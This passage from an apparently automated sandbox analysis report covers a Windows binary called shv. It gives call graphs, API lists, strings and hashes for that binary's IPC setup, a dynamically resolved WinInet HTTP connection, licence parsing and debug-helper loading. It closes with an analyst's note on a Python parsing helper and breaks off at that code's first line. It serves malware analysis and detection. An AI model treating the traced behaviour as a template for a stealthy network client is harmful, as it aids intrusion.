58842 11169dbe __calloc_crt 67 API calls 58841->58842 58843 1116baa5 58842->58843 58843->58838 58844 1116baad DecodePointer 58843->58844 58845 1116babe 58844->58845 58845->58838 58846 1116bac2 58845->58846 58879 1116b688 67 API calls 4 library calls 58846->58879 58848 1116baca GetCurrentThreadId 58848->58831 58850 11169dbe __calloc_crt 67 API calls 58849->58850 58857 111711e7 58850->58857 58851 11171392 GetStdHandle 58858 1117135c 58851->58858 58852 111713f6 SetHandleCount 58854 11169506 
58852->58854 58853 11169dbe __calloc_crt 67 API calls 58853->58857 58854->58805 58854->58806 58855 111713a4 GetFileType 58855->58858 58856 111712dc 58856->58858 58859 11171313 InitializeCriticalSectionAndSpinCount 58856->58859 58860 11171308 GetFileType 58856->58860 58857->58853 58857->58854 58857->58856 58857->58858 58858->58851 58858->58852 58858->58855 58861 111713ca InitializeCriticalSectionAndSpinCount 58858->58861 58859->58854 58859->58856 58860->58856 58860->58859 58861->58854 58861->58858 58863 1116d5bc __IsNonwritableInCurrentImage 58862->58863 58881 1116c9cb EncodePointer 58863->58881 58865 1116d5da __initterm_e __IsNonwritableInCurrentImage 58865->58807 58866->58796 58867->58790 58868->58806 58869->58783 58870->58789 58871->58795 58872->58784 58873->58796 58874->58809 58875->58796 58876->58829 58877->58835 58878->58837 58879->58848 58880->58831 58881->58865 58883 1110f764 EnterCriticalSection 58882->58883 58884 1110f74f InitializeCriticalSection 58882->58884 58885 1110f785 58883->58885 58884->58883 58886 1110f7b3 LeaveCriticalSection 58885->58886 58887 1110f6c0 ___DllMainCRTStartup 4 API calls 58885->58887 58886->58821 58887->58885 58888 110304b8 58889 110304c6 58888->58889 58890 11030518 58889->58890 58892 11081bb0 115 API calls 58889->58892 58891 110ed1a0 2 API calls 58890->58891 58893 1103053f 58891->58893 58892->58890 58897 11030589 58893->58897 58951 110ed250 6 API calls __87except 58893->58951 58895 11030554 58952 110ed250 6 API calls __87except 58895->58952 58899 1110f420 std::locale::facet::_Facet_Register 307 API calls 58897->58899 58898 1103056b 58898->58897 58900 111463d0 19 API calls 58898->58900 58901 110305af 58899->58901 58900->58897 58930 1108a470 58901->58930 58903 110305e3 OpenMutexA 58904 11030603 CreateMutexA 58903->58904 58905 1103071a CloseHandle 58903->58905 58906 11030623 58904->58906 58907 1108a570 71 API calls 58905->58907 58908 1110f420 std::locale::facet::_Facet_Register 307 API calls 58906->58908 58910 11030730 58907->58910 
58909 11030638 58908->58909 58941 11015c30 LoadLibraryA 58909->58941 58911 11161d01 __87except 5 API calls 58910->58911 58912 110310b3 58911->58912 58914 1103066d 58915 111450a0 std::locale::facet::_Facet_Register 121 API calls 58914->58915 58916 1103067c 58915->58916 58917 11030689 58916->58917 58918 1103069c 58916->58918 58942 11145ae0 58917->58942 58919 110306a6 GetProcAddress 58918->58919 58920 11030690 58918->58920 58919->58920 58922 110306c0 SetLastError 58919->58922 58923 110281a0 47 API calls 58920->58923 58922->58920 58924 110306cd 58923->58924 58953 110092f0 454 API calls std::locale::facet::_Facet_Register 58924->58953 58926 110306dc 58927 110306f0 WaitForSingleObject 58926->58927 58927->58927 58928 11030702 CloseHandle 58927->58928 58928->58905 58929 11030713 FreeLibrary 58928->58929 58929->58905 58931 1110f420 std::locale::facet::_Facet_Register 307 API calls 58930->58931 58932 1108a4a7 58931->58932 58933 1108a4c9 InitializeCriticalSection 58932->58933 58934 1110f420 std::locale::facet::_Facet_Register 307 API calls 58932->58934 58937 1108a52a 58933->58937 58936 1108a4c2 58934->58936 58936->58933 58954 1116219a 67 API calls std::exception::_Copy_str 58936->58954 58937->58903 58939 1108a4f9 58955 111625f1 RaiseException 58939->58955 58941->58914 58943 111450a0 std::locale::facet::_Facet_Register 121 API calls 58942->58943 58944 11145af2 58943->58944 58945 11145b30 58944->58945 58946 11145af9 LoadLibraryA 58944->58946 58945->58920 58947 11145b2a 58946->58947 58948 11145b0b GetProcAddress 58946->58948 58947->58920 58949 11145b23 FreeLibrary 58948->58949 58950 11145b1b 58948->58950 58949->58947 58950->58949 58951->58895 58952->58898 58953->58926 58954->58939 58955->58933

Control-flow Graph

• Executed
• Not Executed
                                                                                        control_flow_graph 716 1109e190-1109e1f2 call 1109d980 719 1109e1f8-1109e21b call 1109d440 716->719 720 1109e810 716->720 726 1109e221-1109e235 LocalAlloc 719->726 727 1109e384-1109e386 719->727 721 1109e812-1109e82d call 11161d01 720->721 729 1109e23b-1109e26d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 726->729 730 1109e805-1109e80b call 1109d4d0 726->730 728 1109e316-1109e33b CreateFileMappingA 727->728 732 1109e388-1109e39b GetLastError 728->732 733 1109e33d-1109e35d GetLastError call 1112ef20 728->733 734 1109e2fa-1109e310 729->734 735 1109e273-1109e29e call 1109d3a0 call 1109d3f0 729->735 730->720 736 1109e39d 732->736 737 1109e3a2-1109e3b9 MapViewOfFile 732->737 748 1109e368-1109e370 733->748 749 1109e35f-1109e366 LocalFree 733->749 734->728 758 1109e2e9-1109e2f1 735->758 759 1109e2a0-1109e2d6 GetSecurityDescriptorSacl 735->759 736->737 740 1109e3bb-1109e3d6 call 1112ef20 737->740 741 1109e3f7-1109e3ff 737->741 761 1109e3d8-1109e3d9 LocalFree 740->761 762 1109e3db-1109e3e3 740->762 746 1109e4a1-1109e4b3 741->746 747 1109e405-1109e41e GetModuleFileNameA 741->747 752 1109e4f9-1109e512 call 11161d20 GetTickCount 746->752 753 1109e4b5-1109e4b8 746->753 754 1109e4bd-1109e4d8 call 1112ef20 747->754 755 1109e424-1109e42d 747->755 756 1109e372-1109e373 LocalFree 748->756 757 1109e375-1109e37f 748->757 749->748 779 1109e514-1109e519 752->779 763 1109e59f-1109e603 GetCurrentProcessId GetModuleFileNameA call 1109d810 753->763 777 1109e4da-1109e4db LocalFree 754->777 778 1109e4dd-1109e4e5 754->778 755->754 764 1109e433-1109e436 755->764 756->757 766 1109e7fe-1109e800 call 1109d8c0 757->766 758->734 768 1109e2f3-1109e2f4 FreeLibrary 758->768 759->758 767 1109e2d8-1109e2e3 SetSecurityDescriptorSacl 759->767 761->762 770 1109e3e8-1109e3f2 762->770 771 1109e3e5-1109e3e6 LocalFree 762->771 783 1109e60b-1109e622 CreateEventA 763->783 784 1109e605 763->784 773 
1109e479-1109e49c call 1112ef20 call 1109d8c0 764->773 774 1109e438-1109e43c 764->774 766->730 767->758 768->734 770->766 771->770 773->746 774->773 782 1109e43e-1109e449 774->782 777->778 786 1109e4ea-1109e4f4 778->786 787 1109e4e7-1109e4e8 LocalFree 778->787 788 1109e51b-1109e52a 779->788 789 1109e52c 779->789 785 1109e450-1109e454 782->785 793 1109e624-1109e643 GetLastError * 2 call 1112ef20 783->793 794 1109e646-1109e64e 783->794 784->783 791 1109e470-1109e472 785->791 792 1109e456-1109e458 785->792 786->766 787->786 788->779 788->789 795 1109e52e-1109e534 789->795 800 1109e475-1109e477 791->800 797 1109e45a-1109e460 792->797 798 1109e46c-1109e46e 792->798 793->794 801 1109e650 794->801 802 1109e656-1109e667 CreateEventA 794->802 803 1109e545-1109e59d 795->803 804 1109e536-1109e543 795->804 797->791 805 1109e462-1109e46a 797->805 798->800 800->754 800->773 801->802 807 1109e669-1109e688 GetLastError * 2 call 1112ef20 802->807 808 1109e68b-1109e693 802->808 803->763 804->795 804->803 805->785 805->798 807->808 810 1109e69b-1109e6ad CreateEventA 808->810 811 1109e695 808->811 813 1109e6af-1109e6ce GetLastError * 2 call 1112ef20 810->813 814 1109e6d1-1109e6d9 810->814 811->810 813->814 815 1109e6db 814->815 816 1109e6e1-1109e6f2 CreateEventA 814->816 815->816 819 1109e714-1109e722 816->819 820 1109e6f4-1109e711 GetLastError * 2 call 1112ef20 816->820 822 1109e724-1109e725 LocalFree 819->822 823 1109e727-1109e72f 819->823 820->819 822->823 825 1109e731-1109e732 LocalFree 823->825 826 1109e734-1109e73d 823->826 825->826 827 1109e743-1109e746 826->827 828 1109e7e7-1109e7f9 call 1112ef20 826->828 827->828 830 1109e74c-1109e74f 827->830 828->766 830->828 832 1109e755-1109e758 830->832 832->828 833 1109e75e-1109e761 832->833 834 1109e76c-1109e788 CreateThread 833->834 835 1109e763-1109e769 GetCurrentThreadId 833->835 836 1109e78a-1109e794 834->836 837 1109e796-1109e7a0 834->837 835->834 836->766 838 1109e7ba-1109e7e5 SetEvent call 1112ef20 call 1109d4d0 837->838 839 
1109e7a2-1109e7b8 ResetEvent * 3 837->839 838->721 839->838
APIs
  • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,1B492F88,00080000,00000000,00000000), ref: 1109D46D
  • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
  • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
  • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
• LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,1B492F88,00080000,00000000,00000000), ref: 1109E225
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
• GetVersionExA.KERNEL32(?), ref: 1109E260
• GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
• SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
• FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
• CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
• GetLastError.KERNEL32 ref: 1109E33D
• LocalFree.KERNEL32(?), ref: 1109E366
• LocalFree.KERNEL32(?), ref: 1109E373
• GetLastError.KERNEL32 ref: 1109E390
• MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
• LocalFree.KERNEL32(?), ref: 1109E3D9
• LocalFree.KERNEL32(?), ref: 1109E3E6
  • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
  • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
• LocalFree.KERNEL32(?), ref: 1109E4DB
• LocalFree.KERNEL32(?), ref: 1109E4E8
• _memset.LIBCMT ref: 1109E500
• GetTickCount.KERNEL32 ref: 1109E508
• GetCurrentProcessId.KERNEL32 ref: 1109E5B4
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
• CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
• GetLastError.KERNEL32 ref: 1109E624
• GetLastError.KERNEL32(00000000), ref: 1109E62B
• CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
• GetLastError.KERNEL32 ref: 1109E669
• GetLastError.KERNEL32(00000000), ref: 1109E670
• CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
• GetLastError.KERNEL32 ref: 1109E6AF
• GetLastError.KERNEL32(00000000), ref: 1109E6B6
• CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
• GetLastError.KERNEL32 ref: 1109E6FA
• GetLastError.KERNEL32(00000000), ref: 1109E6FD
• LocalFree.KERNEL32(?), ref: 1109E725
• LocalFree.KERNEL32(?), ref: 1109E732
• GetCurrentThreadId.KERNEL32 ref: 1109E763
• CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
• ResetEvent.KERNEL32(?), ref: 1109E7AC
• ResetEvent.KERNEL32(?), ref: 1109E7B2
• ResetEvent.KERNEL32(?), ref: 1109E7B8
• SetEvent.KERNEL32(?), ref: 1109E7BE
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
• String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
• API String ID: 3291243470-2792520954
• Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
• Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
• Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
• Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51

Control-flow Graph

• Executed
• Not Executed
                                                                                        control_flow_graph 844 11029590-1102961e LoadLibraryA 845 11029621-11029626 844->845 846 11029628-1102962b 845->846 847 1102962d-11029630 845->847 848 11029645-1102964a 846->848 849 11029632-11029635 847->849 850 11029637-11029642 847->850 851 11029679-11029685 848->851 852 1102964c-11029651 848->852 849->848 850->848 853 1102972a-1102972d 851->853 854 1102968b-110296a3 call 11162b51 851->854 855 11029653-1102966a GetProcAddress 852->855 856 1102966c-1102966f 852->856 858 11029748-11029760 InternetOpenA 853->858 859 1102972f-11029746 GetProcAddress 853->859 865 110296c4-110296d0 854->865 866 110296a5-110296be GetProcAddress 854->866 855->856 860 11029671-11029673 SetLastError 855->860 856->851 863 11029784-11029790 _free 858->863 859->858 862 11029779-11029781 SetLastError 859->862 860->851 862->863 867 11029796-110297c7 call 11142290 call 11164390 863->867 868 11029a0a-11029a14 863->868 872 110296d2-110296db GetLastError 865->872 878 110296f1-110296f3 865->878 866->865 869 11029762-1102976a SetLastError 866->869 894 110297c9-110297cc 867->894 895 110297cf-110297e4 call 11081a70 * 2 867->895 868->845 871 11029a1a 868->871 869->872 875 11029a2c-11029a2f 871->875 872->878 879 110296dd-110296ef _free call 11162b51 872->879 876 11029a31-11029a36 875->876 877 11029a3b-11029a3e 875->877 881 11029b9f-11029ba7 876->881 882 11029a40-11029a45 877->882 883 11029a4a 877->883 885 11029710-1102971c 878->885 886 110296f5-1102970e GetProcAddress 878->886 879->878 891 11029bb0-11029bc3 881->891 892 11029ba9-11029baa FreeLibrary 881->892 888 11029b6f-11029b74 882->888 889 11029a4d-11029a55 883->889 885->853 902 1102971e-11029727 885->902 886->885 893 1102976f-11029777 SetLastError 886->893 900 11029b76-11029b8d GetProcAddress 888->900 901 11029b8f-11029b95 888->901 898 11029a57-11029a6e GetProcAddress 889->898 899 11029a74-11029a7d 889->899 892->891 893->853 894->895 914 110297e6-110297ea 
895->914 915 110297ed-110297f9 895->915 898->899 904 11029b2e-11029b30 SetLastError 898->904 907 11029a80-11029a82 899->907 900->901 905 11029b97-11029b99 SetLastError 900->905 901->881 902->853 909 11029b36-11029b3d 904->909 905->881 907->909 912 11029a88-11029a8d 907->912 910 11029b4c-11029b6d call 110278a0 * 2 909->910 910->888 912->910 916 11029a93-11029acf call 1110f4a0 call 11027850 912->916 914->915 918 11029824-11029829 915->918 919 110297fb-110297fd 915->919 943 11029ae1-11029ae3 916->943 944 11029ad1-11029ad4 916->944 925 1102982b-1102983c GetProcAddress 918->925 926 1102983e-11029855 InternetConnectA 918->926 922 11029814-1102981a 919->922 923 110297ff-11029812 GetProcAddress 919->923 922->918 923->922 930 1102981c-1102981e SetLastError 923->930 925->926 932 11029881-1102988c SetLastError 925->932 927 110299f7-11029a07 call 111618c1 926->927 928 1102985b-1102985e 926->928 927->868 933 11029860-11029862 928->933 934 11029899-110298a1 928->934 930->918 932->927 938 11029864-11029877 GetProcAddress 933->938 939 11029879-1102987f 933->939 940 110298a3-110298b7 GetProcAddress 934->940 941 110298b9-110298d4 934->941 938->939 946 11029891-11029893 SetLastError 938->946 939->934 940->941 949 110298d6-110298de SetLastError 940->949 955 110298e1-110298e4 941->955 947 11029ae5 943->947 948 11029aec-11029af1 943->948 944->943 945 11029ad6-11029ada 944->945 945->943 950 11029adc 945->950 946->934 947->948 951 11029af3-11029b09 call 110d1090 948->951 952 11029b0c-11029b0e 948->952 949->955 950->943 951->952 957 11029b10-11029b12 952->957 958 11029b14-11029b25 call 111618c1 952->958 959 110299f2-110299f5 955->959 960 110298ea-110298ef 955->960 957->958 965 11029b3f-11029b49 call 111618c1 957->965 958->910 974 11029b27-11029b29 958->974 959->927 964 11029a1c-11029a29 call 111618c1 959->964 961 110298f1-11029908 GetProcAddress 960->961 962 1102990a-11029916 960->962 961->962 967 11029918-11029920 SetLastError 961->967 973 11029922-1102993b GetLastError 962->973 964->875 
965->910 967->973 976 11029956-1102996b 973->976 977 1102993d-11029954 GetProcAddress 973->977 974->889 980 11029975-11029983 GetLastError 976->980 977->976 978 1102996d-1102996f SetLastError 977->978 978->980 981 11029985-1102998a 980->981 982 1102998c-11029998 GetDesktopWindow 980->982 981->982 983 110299e2-110299e7 981->983 984 110299b3-110299cf 982->984 985 1102999a-110299b1 GetProcAddress 982->985 983->959 986 110299e9-110299ef 983->986 984->959 989 110299d1 984->989 985->984 987 110299d6-110299e0 SetLastError 985->987 986->959 987->959 989->955
APIs
• LoadLibraryA.KERNEL32(WinInet.dll,1B492F88,74DF23A0,?,00000000), ref: 110295C5
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
• SetLastError.KERNEL32(00000078), ref: 11029673
• _malloc.LIBCMT ref: 11029697
• GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
• GetLastError.KERNEL32 ref: 110296D2
• _free.LIBCMT ref: 110296DE
• _malloc.LIBCMT ref: 110296E7
• GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
• GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
• InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
• SetLastError.KERNEL32(00000078), ref: 11029764
• SetLastError.KERNEL32(00000078), ref: 11029771
• SetLastError.KERNEL32(00000078), ref: 1102977B
• _free.LIBCMT ref: 11029785
  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
• SetLastError.KERNEL32(00000078), ref: 1102981E
• GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                        • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                        • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                        • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                        • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                        • API String ID: 921868004-913974648
                                                                                        • Opcode ID: 2d2eeaad931a34bca1b43c66b17deac4db3cf30db8dfadc355f34a03c0ad81b1
                                                                                        • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                        • Opcode Fuzzy Hash: 2d2eeaad931a34bca1b43c66b17deac4db3cf30db8dfadc355f34a03c0ad81b1
                                                                                        • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60
                                                                                        APIs
                                                                                          • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,02B4B870,000000FF,?), ref: 11144ED5
                                                                                          • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,02B4B870,000000FF,?), ref: 11144EE5
                                                                                        • _fgets.LIBCMT ref: 11061DC2
                                                                                        • _strpbrk.LIBCMT ref: 11061E29
                                                                                        • _fgets.LIBCMT ref: 11061F2C
                                                                                        • _strpbrk.LIBCMT ref: 11061FA3
                                                                                        • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                        • _fgets.LIBCMT ref: 11062035
                                                                                        • _strpbrk.LIBCMT ref: 1106205B
                                                                                        Strings
                                                                                        Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: the same twelve associated dumps listed above (0000000011000000 through 000000001132A000)
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                        • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                        • API String ID: 716802716-1571441106
                                                                                        • Opcode ID: 46fe0e2f6ff4984a5f9afa3624aa9af9987d285b72e85ff2ff450320ced83e56
                                                                                        • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                        • Opcode Fuzzy Hash: 46fe0e2f6ff4984a5f9afa3624aa9af9987d285b72e85ff2ff450320ced83e56
                                                                                        • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61

Control-flow Graph
• Function at 11143570 (graph rendered as an image in the report; edge list omitted): 12 basic blocks. The entry block 11143570-111435b1 calls GetModuleFileNameA; the paths then pass through three LoadLibraryA sites, GetModuleHandleA and fifteen GetProcAddress calls (1 + 4 + 10) before the exit block 111436f0-111436f3.
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 111435A3
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                        • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                        • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                        • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                        • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                        • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                        • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                        • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                        • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                        • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                        • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                          • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: the same twelve associated dumps listed above (0000000011000000 through 000000001132A000)
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                        • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                        • API String ID: 3874234733-2061581830
                                                                                        • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                        • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                        • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                        • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D
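The API lists of the WinInet function above (LoadLibraryA of WinInet.dll at 110295C5 onward) and of the DBGHELP.DLL loader at 11143570 show the same construction: LoadLibraryA, a chain of GetProcAddress lookups by export name, and SetLastError(00000078) on the failure path. The Python helper below is an added triage aid, not part of the Joe Sandbox report and not code from the sample; it parses report lines of the form shown in those records (the embedded input is copied from them) and decodes the raw hex arguments with the documented Win32 values INTERNET_SERVICE_HTTP = 3 and ERROR_CALL_NOT_IMPLEMENTED = 0x78, which are assumed to apply to this 32-bit sample. The function names parse_api_line, describe_connect and summarize are mine. The output a reviewer wants is the ordered list of resolved export names (a dynamic-import set usable as a signature), the InternetConnectA port and service type, and whether a user/password pointer was passed.

```python
import re

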